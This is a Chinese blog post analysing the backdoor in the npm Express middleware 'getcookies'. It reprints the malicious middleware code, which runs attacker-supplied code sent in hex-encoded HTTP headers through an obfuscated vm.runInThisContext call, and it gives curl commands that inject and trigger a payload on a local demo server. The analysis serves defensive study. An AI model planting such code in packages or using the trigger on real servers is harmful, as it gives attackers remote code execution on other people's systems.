美文网首页
Express 中间件 getcookies 后门代码分析

Express 中间件 getcookies 后门代码分析

作者: zhoukeke | 来源:发表于2018-05-30 09:47 被阅读0次

    前段时间 Express 中的一个中间件 getcookies 被爆出存在 backdoor,关注了一波,但仅看官方npm 的解释,一时半会儿没想明白黑客是怎么留的后门,一直困扰着我。今天有空仔细看了一下,了解了黑客具体的作案手段。文中的代码可以在 drafts/getcookies 中查找。

    原文链接

    后门代码分析

    这个后门代码找得也不容易,因为在被爆出后门后,npm 团队第一时间就删除下架了,github 上的仓库也没找到,不过不负有心人,在 npm.runkit 中找到了后门源码。

    • 黑客巧妙地把 backdoor 代码伪装成测试代码放在 test 目录中,并在 index.js “不经意” 引入了测试代码
    • 主要的 require('vm')['runInThisContext'] 代码被编码故意伪装了一下
    • 全程使用 16 进制,让不想细看的人以为是测试代码
    // 分配一块 64K 的内存
    module.exports.log = module.exports.log || Buffer.alloc(0xffff);
    
    // gCOMMANDhDATAi
    JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
        // 以 0xfffe 命令为样例
        // 将字符串 feff 读入 Buffer
        // 'feff' => <Buffer fe ff>
        // readUInt16LE 读取 16 bit(位) 并以 byte(字节) 反向排序
        // <Buffer fe ff> => 0xfffe
        //
        // > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
        // true
        // > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
        // '90785634'
        p = Buffer.from(p, 'hex').readUInt16LE(0);
        switch (p) {
    
            case 0xfffe:
                module.exports.log = Buffer.alloc(0xffff);
                return;
            case 0xfffa:
                return setTimeout(() => {
    
                    // 去除末尾的 0x00
                    let c = module.exports.log.toString().replace(/\x00*$/, '');
                    module.exports.log = Buffer.alloc(0xffff);
    
                    // 不能以 0x00 开头
                    if (c.indexOf('\x00') < 0) {
                        // require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
                        // 代码必须是个函数
                        require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
                    }
                    next();
                }, 1000);
            default:
                // 我们以 (function(){console.log('hack')}) 为例
                v = Buffer.from(v, 'hex');
                for (let i = 0; i < v.length; i++) {
    
                    // 因为执行命令的时候,不能以 0x00 开头
                    // 所以,p 必须是 0x0000
                    module.exports.log[p + i] = v[i];
                }
        }
    });
    

    测试一下后门

    写一个 express 应用,并将中间件引入进来

    var express = require('express')
    var app = express()
    
    var getcookies = require('..');
    
    app.use(getcookies);
    app.get('/', function (req, res) {
      res.send('Hello World')
    })
    
    app.listen(3000)
    
    

    启动并执行我们的后门代码

    $ node demo/index.js
    // 向服务器注入 16 进制代码 (function(){console.log('hack')})
    $ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i'  http://127.0.0.1:3000
    // 向服务器发送执行命令
    $ curl -H 'evil: gfaffh00i'  http://127.0.0.1:3000
    

    注意,中途出现的 hack 就是被注入代码的输出。

    image

    References

    相关文章

      网友评论

          本文标题:Express 中间件 getcookies 后门代码分析

          本文链接:https://www.haomeiwen.com/subject/hkctsftx.html